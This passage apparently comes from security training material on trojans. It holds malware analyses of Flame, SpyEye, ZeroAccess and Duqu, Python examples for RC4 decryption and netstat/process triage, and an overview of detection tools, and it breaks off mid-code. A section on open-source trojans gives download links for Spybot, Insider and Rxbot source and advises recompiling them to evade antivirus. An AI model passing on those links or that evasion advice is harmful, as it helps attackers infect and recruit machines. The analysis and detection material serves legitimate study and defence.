Stolen data is protected in two stages. First, the C&C script encrypts the uploaded data with Blowfish in CBC mode using a static IV. The Blowfish key is generated randomly and is then itself encrypted with the operators' public key using the PHP function openssl_public_encrypt, so the symmetric key can be recovered only by whoever holds the matching private key. Symmetric Blowfish for the bulk data combined with asymmetric encryption of the key is a standard hybrid scheme; here it ensures that even someone who seizes the server cannot read the archived data.

[Figure: clients and protocols found in this Flame C&C, from http://www.kaspersky.com]



Trojan Analysis: SpyEye

Source: http://techblog.avira.com
http://techblog.avira.com/2011/03/30/analysis-of-trspy-spyeye/en

SpyEye uses rootkit techniques to hide its presence: it conceals its startup registry entry under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current (the rest of the key name is not legible in the original), and it hides its configuration file, config.bin, which is normally placed in the root directory of the drive on which the trojan is installed.

SpyEye is able to:

- capture network traffic;
- hide its startup registry entry;
- hide its binary code (its own files on disk).

It does this by hooking the following API functions in the virtual address space of winlogon.exe and of other processes such as alg.exe and lsass.exe (listing from the Avira report):

.text  C:\WINDOWS\System32\alg.exe[468]       WININET.dll!InternetReadFileExA     771F7E3A  8 Bytes  JMP 0BAEB2E6
.text  C:\WINDOWS\System32\alg.exe[468]       WININET.dll!HttpSendRequestW        77211808  8 Bytes  JMP 0BAEE286
.text  C:\WINDOWS\system32\winlogon.exe[640]  ntdll.dll!NtEnumerateValueKey       7C80D876  8 Bytes  JMP 0BAD769B
.text  C:\WINDOWS\system32\winlogon.exe[640]  ntdll.dll!NtQueryDirectoryFile      7C80DF5E  8 Bytes  JMP 0BAE2DC2
.text  C:\WINDOWS\system32\winlogon.exe[640]  ntdll.dll!NtResumeThread            7C80E45F  8 Bytes  JMP 0BAF1507
.text  C:\WINDOWS\system32\winlogon.exe[640]  ntdll.dll!NtSetInformationFile      7C80E5D3  8 Bytes  JMP 0BAD73E5
.text  C:\WINDOWS\system32\winlogon.exe[640]  ntdll.dll!NtVdmControl              7C80E875  8 Bytes  JMP 0BAE2E78
.text  C:\WINDOWS\system32\winlogon.exe[640]  kernel32.dll!FlushInstructionCache  7C838277  8 Bytes  JMP 0BAD7831
.text  C:\WINDOWS\system32\winlogon.exe[640]  ADVAPI32.dll!CryptEncrypt           77DF1553  3 Bytes  JMP 0BAEA0E1
.text  C:\WINDOWS\system32\winlogon.exe[640]  CRYPT32.dll!PFXImportCertStore      77AEF743  3 Bytes  JMP 0BADE30A
.text  C:\WINDOWS\system32\winlogon.exe[640]  USER32.dll!TranslateMessage         77D43BCE  3 Bytes  JMP 0BAD330C
.text  C:\WINDOWS\system32\winlogon.exe[640]  WS2_32.dll!send                     71AB428A  3 Bytes  JMP 0BAEA3B5
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!InternetQueryOptionA    771B31A7  3 Bytes  JMP 0BAE7B3D
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!HttpOpenRequestA        771C4AC5  3 Bytes  JMP 0BAE7A33
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!HttpAddRequestHe...     771C540A  3 Bytes  JMP 0BADA639
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!InternetCloseHandle     771C61DC  3 Bytes  JMP 0BAE3415
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!HttpSendRequestA        771C76B3  5 Bytes  [EB, 01, C3, E3, 7...
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!HttpSendRequestA ...    771C76BE  2 Bytes  [32, 34] {XCHG E...
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!HttpQueryInfoA          771C3C6A  3 Bytes  JMP 0BAE7EC0
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!InternetReadFile        771C3555  3 Bytes  JMP 0BAEB1CC
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!InternetQueryDataA...   771D325F  3 Bytes  JMP 0BAEB0DC
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!InternetWriteFile       771F7353  3 Bytes  JMP 0BAEE3F4
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!InternetReadFileExA     771F7E3A  3 Bytes  JMP 0BAEB2E6
.text  C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!HttpSendRequestW        77211808  3 Bytes  JMP 0BAEE286
.text  C:\WINDOWS\System32\lsass.exe[636]     ntdll.dll!NtEnumerateValueKey       7C80D876  3 Bytes  JMP 0BAD769B

Every hook jumps to the same 0x0BAxxxxx region, which is the injected SpyEye module mapped into each process; the WININET and WS2_32 hooks give it the HTTP traffic (form grabbing), the ntdll hooks on NtEnumerateValueKey and NtQueryDirectoryFile hide its registry value and its files, and the CryptEncrypt and PFXImportCertStore hooks let it see data before it is encrypted and steal certificates.
MD5 of the executed sample: (not legible in the original)

Network endpoints observed after the sample was run (TCPView-style listing from the Avira report; 00e5f6a15 is the host name of the analysis machine):

Process        PID   Proto  Local Address  Local Port    Remote Address                       Remote Port  State
svchost.exe    1096  UDP    00e5f6a15      1034
svchost.exe    1272  UDP    00e5f6a15      1900
svchost.exe    1052  UDP    00e5f6a15      1032
System         4     TCP    00e5f6a15      netbios-ssn   00e5f6a15                            0            LISTENING
System         4     TCP    00e5f6a15      microsoft-ds  00e5f6a15                            0            LISTENING
System         4     UDP    00e5f6a15      netbios-ns
System         4     UDP    00e5f6a15      netbios-dgm
System         4     UDP    00e5f6a15      microsoft-ds
winlogon.exe   660   TCP    00e5f6a15      1083          reverse-mtl-76-76-98-82.gogaw.com    https        SYN_SENT

The last row is the tell-tale sign: winlogon.exe has no legitimate reason to open an outbound HTTPS connection. What the listing shows is SpyEye's injected code contacting its C&C server from inside the system process, which is exactly why it hooked winlogon.exe in the first place.
The malware is packed with UPX and additionally wrapped in a polymorphic decryptor. After the UPX layer is removed, the decryptor's entry code pushes a set of constants and two local variables onto the stack and calls the actual decryption routine, sub_42F851:

    push    354171h
    push    6547118h            ; immediate partly unreadable in the scanned listing
    push    969h
    push    3367h
    push    5017h               ; immediate partly unreadable in the scanned listing
    lea     ecx, [ebp-1Ch]
    push    ecx
    push    dword ptr [ebp-0Ch]
    push    dword ptr [ebp-10h]
    call    sub_42F851
    leave
    retn

Trojan Analysis: ZeroAccess

Source: http://www.symantec.com

ZeroAccess, also known as "Smiscer" and the "Max++ rootkit", is a kernel-mode rootkit that uses advanced techniques to hide its presence on the infected system. It reaches victims mainly through web exploit kits and other drive-by downloads. Its operators make money from it primarily through pay-per-click (PPC) advertising fraud: ZeroAccess installs a backdoor that downloads additional modules, and those modules perform click fraud and search engine poisoning.

Click fraud scheme

ZeroAccess's primary payload, fetched through its backdoor, is a module that commits click fraud. To understand why that is profitable, consider how pay-per-click advertising works.

Advertisers sign up with an advertising network, which places their ads on the web sites of its affiliates (publishers). The affiliate is paid a small amount each time a visitor views an ad (pay-per-view) or, more commonly, each time a visitor clicks on one (pay-per-click). An affiliate who can generate large numbers of fake views or clicks is therefore paid for traffic that never came from a real user, and a botnet of infected machines is an ideal source of such traffic.
[Figure: a promotional e-mail from a pay-per-click affiliate network ("ClickIce PPC", advertised through BlackHatMoneyMaker.com), reproduced in the Symantec report as an example of the kind of network that pays for the traffic ZeroAccess generates. It offers webmasters advanced feeds, traffic-processing utilities, PHP/JavaScript/XML/image feeds, keyword databases and support via ICQ and live chat.]
To exploit this, ZeroAccess downloads a click-fraud payload and runs it on the infected machine. The payload silently issues search queries to popular engines, including google.com, bing.com, icq.com, yahoo.com, ask.com and aol.com, and then "clicks" on sponsored results. A typical request looks like the following GET (part of the id value is illegible in the original):

http://suzukimxmrjcn/r/redirect.php?id=9de5404ac67a404a0ela775f212cd21^5&os=501.804.x86

The server answers with HTML that opens a hidden pop-up window or tab and redirects it to an advertiser's site; the returned HTML contains the JavaScript that performs the redirect, so the user never sees the ad while the affiliate is credited with a click.



[Figure: example of the returned HTML. It defines a JavaScript function that writes a page containing a frameset whose frame source is a search-engine URL (www.google.co.uk/search?q=...), answers with HTTP/1.1 200 OK, Connection: close and Cache-Control: no-cache headers and a Content-Length computed from the body, and finally redirects the frame to the advertiser's tracking URL.]

ZeroAccess is distributed by web exploit kits. A kit first fingerprints the visiting browser and its plug-ins, then serves exploits for whatever vulnerable software it finds, such as Adobe Flash Player; whichever exploit succeeds downloads and runs the ZeroAccess installer. Symantec's intrusion prevention (IPS) signatures cover the exploit-kit traffic used to deliver ZeroAccess, so the infection can be blocked at the network level before the rootkit is installed.

https://www.facebook.com/tibea2004
[Figure: packet captures from the Symantec report showing the infection chain. (1) The main attack URL, requested by a browser identifying itself as Firefox/2.0.0.13 (Gecko/20080311) with the usual Accept, Accept-Language: en-us and Accept-Encoding: gzip, deflate headers. (2) The second-stage exploit page, returned as HTTP/1.1 200 OK from Apache/2.2.17 (Unix) PHP/5.2.17 on Tue, 25 Oct 2011, containing heavily obfuscated JavaScript (parseInt/fromCharCode decoding loops). (3) The ZeroAccess download itself, fetched with a User-Agent of Opera/6 (Windows NT 5.1) and returned as Content-Type: application/octet-stream with a Content-Disposition: inline; filename=... header and an "x-pad: avoid browser bug" header.]

Once installed, ZeroAccess overwrites a randomly chosen system driver, for example %System%\Drivers\classpnp.sys or %System%\win32k.sys, with its own kernel-mode code and keeps the driver's original file name so that the infection is not obvious in a directory listing.

The infected driver then creates a hidden NTFS volume inside a file under %System%\config\<RANDOM CHARACTERS>. The original driver code and the downloaded payload files are stored in that volume rather than in the normal file system, so they never appear in ordinary file listings. The volume is exposed to the rootkit through the device symbolic link

\\??\ACPI#PNP0303#2&da1a3ff&0

and the payload delivered through the backdoor is kept inside it under

\\??\ACPI#PNP0303#2&da1a3ff&0\L\[EIGHT RANDOM CHARACTERS]

The contents of the volume are encrypted with RC4 using the following 128-bit key:

\xFF\x7C\xF1\x64\x12\xE2\x2D\x4D\xB1\xCF\x0F\x5D\x6F\xE5\xA0\x49

To make sure the infected driver is loaded on every boot, ZeroAccess registers it as a service by creating the following registry entries (the service is named after the infected driver's original file name):



HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[FILE NAME OF INFECTED DRIVER]\"ImagePath" = (value not shown in the original)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[FILE NAME OF INFECTED DRIVER]\"Type" = "1"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[FILE NAME OF INFECTED DRIVER]\"Start" = "3"

At run time the driver injects code into services.exe by queuing an APC (asynchronous procedure call) in that process. The injected code reads the encrypted payload files from the hidden NTFS volume through \\??\ACPI#PNP0303#2&da1a3ff&0\U, decrypts them with the RC4 key above and loads them. A user-mode loader is also written to an alternate data stream named like %SystemDrive%\2385299062:2302268273.exe, and that loader in turn loads the payload DLLs kept in the hidden volume. Because the payload never exists as an ordinary file on the NTFS file system, file-based antivirus scanning does not see it; detection has to rely on the modified driver, the registry entries above, or the rootkit's behaviour.
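The hidden volume is only as secret as its RC4 key, and the key is hard-coded in the driver, so once it has been extracted an analyst can read the stored payloads offline. The following is an added example, not Symantec's code and not ZeroAccess's: a from-scratch RC4 implementation that uses the 128-bit key quoted above and decrypts a constructed "volume record". ZeroAccess's real on-disk volume layout is not reproduced here; the sample record and the "does it decrypt to a PE image" check are assumptions for the demonstration.

```python
"""RC4 stream cipher, as used by ZeroAccess for its hidden NTFS volume.

Added example, not code from Symantec or from the malware itself. It
implements RC4 from scratch (pure Python, no third-party modules) and uses
the 128-bit key quoted in the analysis above. The sample "volume record"
below is constructed for the demonstration.
"""

ZEROACCESS_RC4_KEY = bytes.fromhex(
    "FF7CF16412E22D4DB1CF0F5D6FE5A049"   # \xFF\x7C\xF1\x64 ... \xA0\x49 from the analysis
)


def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: permute 0..255 under the key."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (RC4 is symmetric: the same call does both)."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray(len(data))
    for n, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = byte ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def looks_like_pe(blob: bytes) -> bool:
    """A decrypted payload should start with the 'MZ' DOS header of a PE file."""
    return blob[:2] == b"MZ"


def decrypt_volume_record(record: bytes, key: bytes = ZEROACCESS_RC4_KEY) -> tuple:
    """Decrypt one stored file and report whether it decrypted to a PE image.

    Returns (plaintext, is_pe). RC4 provides no integrity check: a wrong key
    simply yields garbage, so a plausible header is the evidence an analyst
    uses to confirm the key.
    """
    plain = rc4_crypt(key, record)
    return plain, looks_like_pe(plain)


# Constructed sample: a fake payload DLL header as ZeroAccess would store it.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + b"\x00" * 28 + b"PE\x00\x00" + b"fake zeroaccess payload"
SAMPLE_RECORD = rc4_crypt(ZEROACCESS_RC4_KEY, SAMPLE_PAYLOAD)   # what the hidden volume holds

if __name__ == "__main__":
    plain, is_pe = decrypt_volume_record(SAMPLE_RECORD)
    print("decrypted to PE image:", is_pe)
    _, wrong_is_pe = decrypt_volume_record(SAMPLE_RECORD, key=b"wrong key")
    print("wrong key yields PE image:", wrong_is_pe)
```

The same routine applied to a real volume image extracted from an infected machine would give the payload DLLs directly, which is how such samples are recovered for analysis without letting the rootkit run.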



Trojan Analysis: Duqu

Source: http://www.securelist.com
http://www.securelist.com/en/blog/208193178/Duqu_FAQ

Duqu is a sophisticated trojan that shares code and techniques with the Stuxnet worm and is believed to have been written by the same group. Its main purpose is to act as a backdoor into the compromised system and to facilitate the theft of private information.

The Payload DLL is a large binary that was assembled from several pieces ("slices"), each of them a separate object file compiled with different options, and possibly with different compilers, before being linked into the DLL. Most of the slices are readily recognisable: C++ code that uses the Standard Template Library (STL), run-time library functions, and ordinary user-written code. The largest slice, however, is the one that contains the code that talks to the C&C server, and it does not look like any of these.



[Figure: layout of the code section of the Payload DLL file. Reading from the start of the section: C++ Standard Template Library functions and native C++ code with STL; then the payload slice, written in another language or a C framework with no C++; then more native C++ code with STL; then run-time library code; then native C code used for injection; and finally API thunks and exception handlers. The section addresses are not legible in the original.]
Duqu Framework

The payload slice is the unusual one. It does not carry the signatures of any known C++ compiler (no STL, no familiar run-time helpers), it is not written in the style of user-written C++, yet it is clearly object-oriented. Kaspersky's analysts named this code the "Duqu Framework". Its main characteristics are:

- everything is wrapped into objects;
- the function table (the equivalent of a C++ vtable) is placed directly inside the class instance and can be modified after construction;
- there is no visible distinction between utility classes (linked lists, hashes) and the user-written code;
- objects communicate with each other through method calls, deferred execution queues and event-driven callbacks;
- there are no references to run-time library functions; the native Windows API is used instead.


Event-Driven Framework

A closer look at the Duqu Framework shows that its objects were not built around any standard library and that the whole framework is event-driven. Its event model is built from a small set of special objects:

- Event objects, which wrap native Windows API synchronisation handles;
- Thread context objects, which hold lists of events and deferred execution queues;
- Callback objects, which are linked to events;
- Event monitors, created by a thread context to watch events and to execute the callback objects attached to them;
- Thread context storage, which manages the list of active threads and provides access to the per-thread context.

The resulting code does not match the object layout produced by C++ compilers and is not Objective-C either; it shows no sign of having been produced by an ordinary C compiler from ordinary C source.



[Figure: event-driven model of the Duqu Framework, in three steps. (1) A Callback object connects to a native OS event, and the Event object registers itself in the thread context, whose storage holds the event and call queue. (2) The event is signalled by the OS or by another object. (3) The Event monitor executes the callback objects in the thread that owns them.]
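The three-step model in the figure is easier to follow as running code. The following is an added example and is not Duqu's code (which exists only as a native binary): it is a small Python reconstruction of the five object kinds the analysis describes, written to make the control flow concrete. Class names, the queue structure and the demonstration events ("c2_connected", "timer_tick") are assumptions for illustration.

```python
"""Minimal model of the Duqu Framework's event-driven object design.

Added example: not Duqu's code, but a reconstruction of the five object
kinds described above (event, callback, thread context, event monitor,
thread context storage) showing how a signalled event turns into a deferred
callback that runs in the thread owning it. Names are assumptions.
"""
from collections import deque


class EventObject:
    """Wraps a native synchronisation primitive; here just a signalled flag."""
    def __init__(self, name):
        self.name, self.signalled, self.monitors = name, False, []

    def signal(self):
        """Called by 'the OS' or by another object; notifies every monitor."""
        self.signalled = True
        for monitor in self.monitors:
            monitor.on_signal(self)


class CallbackObject:
    """A callable bound to an event; it belongs to one thread context."""
    def __init__(self, event, fn, owner):
        self.event, self.fn, self.owner = event, fn, owner


class EventMonitor:
    """Created by a thread context; queues callbacks when their event fires."""
    def __init__(self, context):
        self.context, self.callbacks = context, {}

    def watch(self, event, cb):
        self.callbacks.setdefault(event, []).append(cb)
        event.monitors.append(self)            # the event registers itself

    def on_signal(self, event):
        for cb in self.callbacks.get(event, []):
            cb.owner.call_queue.append((cb, event))   # deferred, not run inline


class ThreadContext:
    """Per-thread state: registered events plus a deferred-execution queue."""
    def __init__(self, thread_id):
        self.thread_id, self.events, self.call_queue = thread_id, [], deque()
        self.monitor = EventMonitor(self)

    def register(self, event, fn):
        cb = CallbackObject(event, fn, owner=self)
        self.events.append(event)
        self.monitor.watch(event, cb)
        return cb

    def run_pending(self):
        """Executes queued callbacks in the owning thread; returns their results."""
        results = []
        while self.call_queue:
            cb, event = self.call_queue.popleft()
            results.append(cb.fn(event))
        return results


class ThreadContextStorage:
    """Maps thread ids to their context, giving per-thread access."""
    def __init__(self):
        self.contexts = {}

    def get(self, thread_id):
        return self.contexts.setdefault(thread_id, ThreadContext(thread_id))


def demo():
    """Two threads; one shared event and one private event.
    Returns (queued callbacks per thread before running, results of t1, results of t2)."""
    storage = ThreadContextStorage()
    t1, t2 = storage.get(1), storage.get(2)
    connected = EventObject("c2_connected")
    timer = EventObject("timer_tick")
    t1.register(connected, lambda ev: f"t1 handles {ev.name}")
    t2.register(connected, lambda ev: f"t2 handles {ev.name}")
    t2.register(timer, lambda ev: f"t2 handles {ev.name}")
    connected.signal()          # lands in both contexts' queues
    timer.signal()              # only thread 2 registered for it
    queued_before = (len(t1.call_queue), len(t2.call_queue))
    return queued_before, t1.run_pending(), t2.run_pending()


if __name__ == "__main__":
    print(demo())
```

The point the model makes is the one that confused the first analysts: nothing here needs a C++ run time or an STL, only function pointers stored in objects and a per-thread queue, which is why the binary showed object-oriented structure without any compiler's fingerprints.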
Trojan Types in Kali Linux

Binary Trojan Horses

Binary trojan horses are distributed as compiled executables (.exe) and are usually closed-source. Most of them are "prank" remote-control tools rather than serious attack tools: typical features are swapping the mouse buttons, ejecting the CD-ROM tray and similar annoyances, with a backdoor underneath. Because the attacker receives a ready-made binary, there is no way to change its behaviour or to make it evade detection, and practically every antivirus product detects the well-known ones; they are only usable where no antivirus is present. A classic example of this class is Optix Pro.

http://www.offensivesecurity.com/pwbonh^ (link truncated in the original)

Open Source Trojan Horses

Open-source trojans are far more useful to a penetration tester than binary ones because the source code is available: the tester can modify it and recompile it, which changes the signature that antivirus products rely on. Most antivirus engines detect the unmodified builds of these trojans, so a fresh build with code changes is usually required before deployment. The examples below are from the Offensive Security PWB course material.

1. Spybot

Spybot is an IRC-based trojan: once started it connects to an IRC server and waits in a channel for commands from the attacker. This design requires the attacker to run, or have access to, an IRC server that the compromised host can reach. Spybot is compiled with lccwin32.

http://www.offensive-security.com/pwbonline/spybot.tar.gz

2. Insider

Insider is an HTTP-based trojan designed to bypass corporate firewalls and proxies. It communicates by issuing ordinary HTTP GET requests to the attacker's web server and reads the proxy settings from the Windows registry, so that it goes out through the same proxy as the user's browser. Since outbound HTTP is allowed almost everywhere, its traffic blends in with normal browsing.

http://www.offensive-security.com/pwbonline/insider.tar.gz

World Domination Trojan Horses

World domination trojan horses are hybrid worm/trojan programs: besides accepting commands, they scan for other hosts (usually on a configured IP range), exploit them automatically with built-in exploits and install a copy of themselves on each victim. When a new remotely exploitable vulnerability is published, attackers add the exploit to such a bot and can build a large botnet within hours; the course cites a case where a bot compromised about 4000 machines in 24 hours. The resulting botnets are then used for DDoS attacks and similar activities.

1. Rxbot

Rxbot is an IRC-based bot of this type. It carries a large set of built-in exploits for spreading and includes anti-debugging features to hamper analysis.

http://www.offensive-security.com/pwbonline/rxbot.tar.gz
(6.5) TROJAN DETECTION

Detecting a trojan on your system is not easy: a well-written trojan hides itself, but it still has to leave traces somewhere, and those traces are what detection relies on. Finding the trojan early limits the damage and keeps the system and its data safe.

How to Detect Trojans?

A trojan that has infected your machine can steal your data, alter your files and open a way in for the attacker, so checking the system regularly for signs of infection is worthwhile. The following checks cover the places where a trojan normally leaves traces:

- scan for suspicious open ports;
- scan for suspicious running processes;
- scan for suspicious registry entries;
- scan for suspicious device drivers installed on the computer;
- scan for suspicious Windows services;
- scan for suspicious startup programs;
- scan for suspicious files and folders;
- scan for suspicious network activities;
- scan for suspicious modifications to the operating system files;
- run a trojan scanner to detect known trojans.

Scanning for Suspicious Ports

Trojans open unused ports on the victim machine in order to connect back to the attacker or to wait for the attacker's connection. Checking which ports are open and which connections are established is therefore a good first step. On Windows (the screenshot below was taken on Windows XP) run netstat -an in a command prompt: it lists every listening port and every active connection together with the protocol, the local and foreign address and the connection state. Compare the result with what you expect the machine to be doing; a listening port you cannot account for, or a connection to an unknown remote host, is worth investigating.


[Figure: output of "netstat -an" in a Windows command prompt, as run by the system administrator. The Active Connections table lists Proto, Local Address, Foreign Address and State: a number of TCP ports in LISTENING state bound to 0.0.0.0 and 127.0.0.1, and several ESTABLISHED TCP connections between loopback ports.]
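Reading a netstat listing by eye does not scale, and the judgement calls it involves (which listening ports are normal, which processes may talk to the network at all) can be written down. The following is an added example, not part of the original course material: it parses the output of netstat -ano (the -o switch adds the owning PID to the format shown above), joins it with a PID-to-image map such as tasklist would give, and applies three checks. The netstat text, the process map, the port allowlist and the list of "never-talks-to-the-network" system processes are constructed assumptions; the winlogon.exe row mirrors the SpyEye behaviour analysed earlier on this page.

```python
"""Triage of "netstat -ano" output for trojan indicators.

Added example, not part of the original course text. Three checks a responder
otherwise does by eye: unexpected LISTENING ports, outbound connections from
system processes that never talk to the network, and connections to uncommon
remote ports. The listing and the process map are constructed.
"""
import ipaddress
import re

# Ports a stock Windows workstation is expected to listen on (assumption:
# adjust to the baseline of the environment being checked).
EXPECTED_LISTENERS = {135, 139, 445, 3389}
# Processes that have no legitimate reason to open outbound connections.
NO_NETWORK_PROCESSES = {"winlogon.exe", "lsass.exe", "csrss.exe", "smss.exe", "services.exe"}
COMMON_REMOTE_PORTS = {25, 53, 80, 110, 143, 443, 465, 587, 993, 995}

_LINE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)\s+(?:(\w+)\s+)?(\d+)\s*$"
)


def parse_netstat(text: str) -> list:
    """Turn netstat -ano lines into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        proto, laddr, lport, raddr, rport, state, pid = m.groups()
        rows.append({
            "proto": proto, "laddr": laddr, "lport": int(lport) if lport != "*" else None,
            "raddr": raddr, "rport": int(rport) if rport != "*" else None,
            "state": state or "", "pid": int(pid),
        })
    return rows


def is_external(addr: str) -> bool:
    """True for a routable remote address (not loopback, private, link-local or unspecified)."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_unspecified or ip.is_link_local)


def triage(netstat_text: str, processes: dict) -> list:
    """Return (severity, reason, row) findings in the order the rows appear."""
    findings = []
    for row in parse_netstat(netstat_text):
        image = processes.get(row["pid"], "<unknown>")
        if row["state"] == "LISTENING" and row["lport"] not in EXPECTED_LISTENERS:
            findings.append(("medium", f"{image} listening on unexpected TCP port {row['lport']}", row))
        outbound = row["state"] in ("ESTABLISHED", "SYN_SENT") and is_external(row["raddr"])
        if outbound and image.lower() in NO_NETWORK_PROCESSES:
            findings.append(("high", f"system process {image} connecting out to {row['raddr']}:{row['rport']}", row))
        elif outbound and row["rport"] not in COMMON_REMOTE_PORTS:
            findings.append(("low", f"{image} connected to uncommon remote port {row['rport']}", row))
    return findings


# Constructed sample output of "netstat -ano" on a Windows XP host.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       1840
  TCP    192.168.1.10:1083      76.76.98.82:443        SYN_SENT        660
  TCP    192.168.1.10:4164      123.176.32.147:80      ESTABLISHED     772
  TCP    192.168.1.10:4170      93.184.216.34:6667     ESTABLISHED     1840
  UDP    0.0.0.0:1900           *:*                                    1272
"""
# Constructed PID -> image map (what "tasklist" would show at the same moment).
SAMPLE_PROCESSES = {4: "System", 660: "winlogon.exe", 772: "chrome.exe",
                    892: "svchost.exe", 1272: "svchost.exe", 1840: "updater.exe"}

if __name__ == "__main__":
    for severity, reason, row in triage(SAMPLE_NETSTAT, SAMPLE_PROCESSES):
        print(f"[{severity}] {reason} (pid {row['pid']})")
```

The "system process talking to the Internet" rule is the strongest of the three: a browser on port 443 is normal, winlogon.exe on port 443 is not, and that distinction is invisible in plain netstat -an output because it lacks the PID column.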
Port Monitoring Tools: TCPView and CurrPorts

TCPView

Source: http://technet.microsoft.com

TCPView is a Windows program that shows a detailed listing of all TCP and UDP endpoints on your system, including the local and remote addresses and the state of each TCP connection. On Windows Server 2008, Vista and XP it also reports the name of the process that owns each endpoint. It provides a more informative and conveniently presented subset of what the netstat program that ships with Windows shows. The TCPView download also includes Tcpvcon, a command-line version with the same functionality.

When you start TCPView it enumerates all active TCP and UDP endpoints, resolving IP addresses to their domain-name equivalents (a toolbar button switches to raw addresses). By default it updates every second, and endpoints that appear, disappear or change state between refreshes are highlighted in colour, so new connections stand out. You can close an established TCP connection by selecting it and choosing File | Close Connections, or from the right-click context menu, and you can save the current window contents to a file for later comparison.


[Figure: TCPView (Sysinternals, www.sysinternals.com) main window. Columns: Process, PID, Protocol, Local Address, Local Port, Remote Address, Remote Port, State. Visible rows include chrome.exe (PID 772) with several ESTABLISHED HTTP connections to 123.176.32.x and other hosts, one CLOSE_WAIT and one TIME_WAIT; firefox.exe (PID 3876) with ESTABLISHED HTTPS connections; edpr_server.exe (PID 3380) LISTENING on ports 12121 and 12122; lsass.exe and services.exe LISTENING on local RPC ports; and a process (PID 3688) with an ESTABLISHED connection to port 5222 (XMPP) and a SYN_SENT connection to an HTTP server. Status bar: Endpoints: 69, Established: 22, Listening: 26, Time Wait: 1, Close Wait: 1.]
CurrPorts Tool

CurrPorts is a network monitoring utility that displays the list of all TCP/IP and UDP ports currently open on your local computer. For each port it shows the process that opened it, including the full path of the process, its version information, the time it was created and the user that runs it. It also lets you close unwanted TCP connections, kill the process that opened the ports, and export the list of ports to an HTML, XML or tab-delimited text file.

On Linux the equivalent checks are done from the shell with:

1. top
2. netstat

Scanning for Suspicious Processes

Trojans routinely use rootkit techniques to hide their processes from Task Manager and similar tools. Trojans and worms usually get onto a system through e-mail attachments, shared files and downloads, and once running they try to blend in with legitimate processes. Monitoring which processes run, what they load and what they touch is therefore an effective way of spotting trojans, worms and backdoors; the tools below help with that.

Process Monitor

Source: http://technet.microsoft.com

Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. It combines the features of two earlier Sysinternals utilities, Filemon and Regmon, and adds a number of enhancements: rich, non-destructive filtering, comprehensive event properties such as session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, and more.



[Figure: Process Monitor (Sysinternals, www.sysinternals.com) window. Columns: Time, Process Name, PID, Operation, Path, Result. Example rows: Explorer.EXE (PID 5572) performing CreateFile and QueryBasicInformationFile on C:\Program Files (x86)\Mozilla Firefox\... (SUCCESS / NAME NOT FOUND) and RegOpenKey, RegQueryValue and RegCloseKey on HKLM\SOFTWARE\Microsoft\Win...; csrss.exe (PID 548) performing ReadFile on C:\Windows\System32\csrsrv.dll and sxs.dll (SUCCESS). Status bar: Showing 359,375 of 662,305 events, backed by virtual memory.]
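The process monitors described in this section give you names, PIDs, parent PIDs, image paths and user accounts; what they do not do is decide which processes are impostors. The following is an added example, not part of the original text and not code from any of the tools listed: it applies to a process snapshot the checks an analyst runs against that data, namely a system binary running from the wrong directory, svchost.exe not started by services.exe, a look-alike name such as svch0st.exe, and a system process running as the wrong user. The snapshot and the expectation table (Windows XP/7 layout) are constructed assumptions.

```python
"""Checks a process snapshot for the impersonation tricks trojans use.

Added example, not part of the original text or of the tools it lists. Given
the data Process Monitor, What's Running or "tasklist /v" expose (name, PID,
parent PID, image path, user), it flags processes hiding behind system names.
The snapshot and the expectation table are constructed for the demonstration.
"""
import ntpath

# Where each well-known image must live, which parent must start it and which
# accounts may run it (assumption: Windows XP/7 layout; adjust to your baseline).
EXPECTED = {
    "svchost.exe":  {"dir": r"c:\windows\system32", "parent": "services.exe",
                     "users": {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}},
    "lsass.exe":    {"dir": r"c:\windows\system32", "parent": "winlogon.exe", "users": {"SYSTEM"}},
    "services.exe": {"dir": r"c:\windows\system32", "parent": "winlogon.exe", "users": {"SYSTEM"}},
    "winlogon.exe": {"dir": r"c:\windows\system32", "parent": "smss.exe",     "users": {"SYSTEM"}},
    "csrss.exe":    {"dir": r"c:\windows\system32", "parent": "smss.exe",     "users": {"SYSTEM"}},
    "explorer.exe": {"dir": r"c:\windows",          "parent": None,           "users": None},
}


def _homoglyph_normalise(name: str) -> str:
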